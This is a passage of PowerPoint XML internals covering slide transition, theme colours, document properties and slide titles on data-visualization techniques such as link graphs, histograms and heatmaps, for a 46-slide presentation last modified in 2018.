      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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ustom Design">
  <a:themeElements>
    <a:clrScheme name="Custom 1">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="44546A"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="003F0B"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FE7802"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="003257"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="41BF00"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="007F16"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="C1EC01"/>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751</TotalTime>
  <Words>10662</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>795</Paragraphs>
  <Slides>46</Slides>
  <Notes>46</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46</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="56" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Lucida Sans</vt:lpstr>
      <vt:lpstr>Merriweather Sans</vt:lpstr>
      <vt:lpstr>Noto Sans Symbols</vt:lpstr>
      <vt:lpstr>StarSymbol</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Copyright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Visualizaton: link graphs</vt:lpstr>
      <vt:lpstr>Time-based visualization</vt:lpstr>
      <vt:lpstr>Visualization: histograms</vt:lpstr>
      <vt:lpstr>Visualization: heatmaps</vt:lpstr>
      <vt:lpstr>Visualization: scatter plots</vt:lpstr>
      <vt:lpstr>Data density in visualizations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Serge Droz</cp:lastModifiedBy>
  <cp:revision>43</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1601-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-17T22:26:36Z</dcterms:modified>
</cp:coreProperties>
</file>